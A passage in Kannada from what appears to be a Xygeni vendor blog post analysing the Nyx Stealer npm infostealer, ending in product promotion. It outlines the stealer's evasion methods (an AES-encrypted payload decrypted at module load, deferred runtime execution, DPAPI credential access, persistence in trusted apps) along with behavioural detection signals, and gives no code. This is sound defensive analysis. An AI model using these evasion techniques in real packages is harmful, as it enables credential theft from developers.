ಹೋಸ್ಟ್ ಮಟ್ಟದಲ್ಲಿ, ಅನುಮಾನಾಸ್ಪದ ಮಾದರಿಗಳಲ್ಲಿ ಅನಿರೀಕ್ಷಿತ DPAPI ಡೀಕ್ರಿಪ್ಶನ್ ಚಟುವಟಿಕೆ, Node.js ಅವಲಂಬನೆ ಸಂದರ್ಭದಿಂದ ಪ್ರಕ್ರಿಯೆ ಹುಟ್ಟಿಕೊಳ್ಳುವಿಕೆ ಮತ್ತು ಮೂರನೇ ವ್ಯಕ್ತಿಯ ಗ್ರಂಥಾಲಯಗಳಿಂದ ಎಂದಿಗೂ ಬದಲಾಯಿಸಬಾರದ ಸ್ಥಳೀಯ ಅಪ್ಲಿಕೇಶನ್ ಫೈಲ್‌ಗಳ ಮಾರ್ಪಾಡು ಸೇರಿವೆ. ಅಂತೆಯೇ, ನೆಟ್‌ವರ್ಕ್ ಪದರದಲ್ಲಿ, ಅಭಿವೃದ್ಧಿ ಅವಲಂಬನೆಯಿಂದ ಪ್ರಾರಂಭಿಸಲಾದ ಹೊರಹೋಗುವ ವೆಬ್‌ಹುಕ್-ಶೈಲಿಯ ಸಂವಹನವು ಮತ್ತೊಂದು ಅರ್ಥಪೂರ್ಣ ಅಸಂಗತತೆಯನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತದೆ.

ಬೇರೆ ರೀತಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ಪತ್ತೆ ಮೇಲ್ಮೈ ರಾಜಿಯ ಏಕೈಕ ಸೂಚಕವಲ್ಲ. ಇದು ಎನ್‌ಕ್ರಿಪ್ಶನ್, ರನ್‌ಟೈಮ್ ಎಕ್ಸಿಕ್ಯೂಶನ್, ರುಜುವಾತು ಪ್ರವೇಶ ಮತ್ತು ನಿರಂತರ ನಡವಳಿಕೆಯ ಪರಸ್ಪರ ಸಂಬಂಧವಾಗಿದ್ದು ಅದು ಬೆದರಿಕೆಯನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತದೆ.

ಕ್ಸಿಜೆನಿಯೊಂದಿಗೆ ಪತ್ತೆ ಮತ್ತು ತಗ್ಗಿಸುವಿಕೆ

npm ಮಾಹಿತಿ ಕಳ್ಳತನ

ಈ npm ಮಾಹಿತಿ ಕಳ್ಳತನಕಾರನನ್ನು ಗುರುತಿಸಿದ್ದು ಕ್ಸಿಜೆನಿಯ ಮಾಲ್‌ವೇರ್ ಮುನ್ನೆಚ್ಚರಿಕೆ (MEW) ಸರಳ ಸಹಿ ಹೊಂದಾಣಿಕೆಯ ಬದಲು ಪದರಗಳ ವರ್ತನೆಯ ಪರಸ್ಪರ ಸಂಬಂಧದ ಮೂಲಕ.

ತಿಳಿದಿರುವ ದುರುದ್ದೇಶಪೂರಿತ ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಹುಡುಕುವ ಬದಲು, MEW ಪೂರ್ಣ ಮೂಲ ವೃಕ್ಷದಾದ್ಯಂತ ರಚನಾತ್ಮಕ ವೈಪರೀತ್ಯಗಳನ್ನು ಮೌಲ್ಯಮಾಪನ ಮಾಡುತ್ತದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಹಲವಾರು ಸಿಗ್ನಲ್‌ಗಳ ಒಮ್ಮುಖದಿಂದ ಪತ್ತೆ ಹೊರಹೊಮ್ಮಿತು: ಮಾಡ್ಯೂಲ್ ಎಂಟ್ರಿ ಪಾಯಿಂಟ್‌ನಲ್ಲಿ ಎಂಬೆಡೆಡ್ AES ಡೀಕ್ರಿಪ್ಶನ್ ದಿನಚರಿ, VM ಸನ್ನಿವೇಶದೊಳಗೆ ತಕ್ಷಣದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆ ಮತ್ತು ಸ್ಪಷ್ಟ ಸಾಮರ್ಥ್ಯ-ಉದ್ದೇಶದ ಹೊಂದಾಣಿಕೆಯಿಲ್ಲ.

ಮುಖ್ಯವಾಗಿ, ಈ ಯಾವುದೇ ಸಂಕೇತಗಳು ದುರುದ್ದೇಶಪೂರಿತ ಉದ್ದೇಶವನ್ನು ಸಾಬೀತುಪಡಿಸುವುದಿಲ್ಲ. ಆದಾಗ್ಯೂ, ಒಟ್ಟಿಗೆ ವಿಶ್ಲೇಷಿಸಿದಾಗ, ಅವು ರನ್‌ಟೈಮ್ ನಡವಳಿಕೆಯನ್ನು ಮರೆಮಾಚುವ ಪ್ರಯತ್ನವನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತವೆ. ಈ ಬಹು-ಹಂತದ ವಿಧಾನವು ಹೆಚ್ಚಿನ ವಿಶ್ವಾಸದ ಪೂರೈಕೆ ಸರಪಳಿ ಬೆದರಿಕೆಗಳನ್ನು ಗುರುತಿಸುವಾಗ ತಪ್ಪು ಧನಾತ್ಮಕತೆಯನ್ನು ಗಮನಾರ್ಹವಾಗಿ ಕಡಿಮೆ ಮಾಡುತ್ತದೆ.

ಇದಲ್ಲದೆ, ಈ ಪ್ರಕರಣವು ಅನುಸ್ಥಾಪನಾ-ಸಮಯದ ಪರಿಶೀಲನೆ ಮಾತ್ರ ಏಕೆ ಸಾಕಾಗುವುದಿಲ್ಲ ಎಂಬುದನ್ನು ವಿವರಿಸುತ್ತದೆ. ದುರುದ್ದೇಶಪೂರಿತ ತರ್ಕವು ಜೀವನಚಕ್ರ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳಲ್ಲಿ ಇರುವುದಿಲ್ಲ. ಇದು ಮಾಡ್ಯೂಲ್ ಲೋಡ್ ಆದ ನಂತರವೇ ಸಕ್ರಿಯಗೊಳ್ಳುತ್ತದೆ ಮತ್ತು ಮೆಮೊರಿಯಲ್ಲಿ ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ನಂತರ ಮಾತ್ರ ಗೋಚರಿಸುತ್ತದೆ. ಆದ್ದರಿಂದ, ಪರಿಣಾಮಕಾರಿ ರಕ್ಷಣೆಗೆ ಎನ್‌ಕ್ರಿಪ್ಶನ್-ಅರಿವು ವಿಶ್ಲೇಷಣೆ, ನಡವಳಿಕೆಯ ಮಾದರಿ ಗುರುತಿಸುವಿಕೆ ಮತ್ತು ಅನುಸ್ಥಾಪನಾ ಘಟನೆಗಳನ್ನು ಮೀರಿ ನಿರಂತರ ಅವಲಂಬನೆ ಮೇಲ್ವಿಚಾರಣೆ ಅಗತ್ಯವಿರುತ್ತದೆ.

ರಿಜಿಸ್ಟ್ರಿ ತೆಗೆದುಹಾಕುವಿಕೆಯು ಪ್ರತಿಕ್ರಿಯಾತ್ಮಕವಾಗಿದೆ. ರನ್‌ಟೈಮ್-ಅವೇರ್ ವಿಶ್ಲೇಷಣೆಯು ತಡೆಗಟ್ಟುವಂತಿದೆ.

ಈ npm ಮಾಹಿತಿ ಕಳ್ಳತನ ಏಕೆ ಮುಖ್ಯ?

Nyx ಸ್ಟೀಲರ್ npm-ಆಧಾರಿತ ಮಾಲ್‌ವೇರ್‌ನಲ್ಲಿ ರಚನಾತ್ಮಕ ವಿಕಸನವನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತದೆ.

ಐತಿಹಾಸಿಕವಾಗಿ, ಅನೇಕ ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್‌ಗಳು ಗೋಚರ ಇನ್‌ಸ್ಟಾಲ್-ಟೈಮ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು ಅಥವಾ ಸ್ಪಷ್ಟವಾದ ರುಜುವಾತು ಹೊರಹರಿವಿನ ಅಂತಿಮ ಬಿಂದುಗಳನ್ನು ಅವಲಂಬಿಸಿವೆ. ಇದಕ್ಕೆ ವ್ಯತಿರಿಕ್ತವಾಗಿ, ಈ ಅಭಿಯಾನವು ಅದರ ಪೇಲೋಡ್ ಅನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ, ರನ್‌ಟೈಮ್‌ಗೆ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ಮುಂದೂಡುತ್ತದೆ, ಕಾನೂನುಬದ್ಧ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ API ಗಳನ್ನು ನಿಯಂತ್ರಿಸುತ್ತದೆ ಮತ್ತು ವಿಶ್ವಾಸಾರ್ಹ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ನಿರಂತರತೆಯನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ.

ಪರಿಣಾಮವಾಗಿ, ಆಕ್ರಮಣಕಾರನು npm ಮೂಲಸೌಕರ್ಯವನ್ನು ಸ್ವತಃ ಬಳಸಿಕೊಳ್ಳುವ ಅಗತ್ಯವಿಲ್ಲ. ಬದಲಾಗಿ, ಅವಲಂಬನೆ ಸ್ಥಾಪನೆಯು ನಂಬಿಕೆಯನ್ನು ಸೂಚಿಸುವುದರಿಂದ ದಾಳಿ ಯಶಸ್ವಿಯಾಗುತ್ತದೆ. ಡೆವಲಪರ್‌ಗಳು ಗ್ರಂಥಾಲಯವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವುದು ಸುರಕ್ಷಿತ ಕಾರ್ಯಾಚರಣೆ ಎಂದು ಭಾವಿಸುತ್ತಾರೆ, ವಿಶೇಷವಾಗಿ ಅದು ಜನಪ್ರಿಯ ಸಾಧನದ ತೋರಿಕೆಯ ಫೋರ್ಕ್ ಆಗಿ ತನ್ನನ್ನು ತಾನು ಪ್ರಸ್ತುತಪಡಿಸಿದಾಗ.

ಪರಿಸರ ವ್ಯವಸ್ಥೆಗಳು ಬೆಳೆಯುತ್ತಲೇ ಇರುವುದರಿಂದ ಮತ್ತು ಕವಲೊಡೆಯುವಿಕೆಗಳು ಹೆಚ್ಚಾದಂತೆ, ಆ ಸೂಚ್ಯ ನಂಬಿಕೆಯ ಗಡಿರೇಖೆಯು ಹೆಚ್ಚು ಆಕರ್ಷಕವಾದ ದಾಳಿಯ ಮೇಲ್ಮೈಯಾಗುತ್ತದೆ. ಆದ್ದರಿಂದ, ಆಧುನಿಕ npm ಇನ್ಫೋಸ್ಟೆಲರ್‌ಗಳ ವಿರುದ್ಧ ರಕ್ಷಿಸಲು ಸ್ಥಿರ ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಹುಡುಕುವ ಬದಲು ವಾಸ್ತುಶಿಲ್ಪದ ಮಾದರಿಗಳನ್ನು ಗುರುತಿಸುವ ಅಗತ್ಯವಿದೆ.

ಅಂತಿಮವಾಗಿ, ಈ ಅಭಿಯಾನವು ಒಂದು ನಿರ್ಣಾಯಕ ಪಾಠವನ್ನು ಬಲಪಡಿಸುತ್ತದೆ software supply chain security: ಅತ್ಯಂತ ಅಪಾಯಕಾರಿ ಬೆದರಿಕೆಗಳು ಮೊದಲ ನೋಟದಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತವಾಗಿ ಕಾಣುವ ಬೆದರಿಕೆಗಳಲ್ಲ, ಆದರೆ ರನ್‌ಟೈಮ್ ಅವುಗಳ ನಿಜವಾದ ನಡವಳಿಕೆಯನ್ನು ಬಹಿರಂಗಪಡಿಸುವವರೆಗೆ ರಚನಾತ್ಮಕವಾಗಿ ಕಾನೂನುಬದ್ಧವಾಗಿ ಗೋಚರಿಸುವ ಬೆದರಿಕೆಗಳಾಗಿವೆ.

ಸ್ಕಾ-ಪರಿಕರಗಳು-ಸಾಫ್ಟ್‌ವೇರ್-ಸಂಯೋಜನೆ-ವಿಶ್ಲೇಷಣೆ-ಪರಿಕರಗಳು
ನಿಮ್ಮ ಸಾಫ್ಟ್‌ವೇರ್ ಅಪಾಯಗಳಿಗೆ ಆದ್ಯತೆ ನೀಡಿ, ನಿವಾರಿಸಿ ಮತ್ತು ಸುರಕ್ಷಿತಗೊಳಿಸಿ
ನಿಮ್ಮ ಉಚಿತ ಖಾತೆಯನ್ನು ಪಡೆಯಿರಿ.
ಯಾವುದೇ ಕ್ರೆಡಿಟ್ ಕಾರ್ಡ್ ಅಗತ್ಯವಿಲ್ಲ.

ನಿಮ್ಮ ಸಾಫ್ಟ್‌ವೇರ್ ಅಭಿವೃದ್ಧಿ ಮತ್ತು ವಿತರಣೆಯನ್ನು ಸುರಕ್ಷಿತಗೊಳಿಸಿ

Xygeni ಉತ್ಪನ್ನ ಸೂಟ್‌ನೊಂದಿಗೆ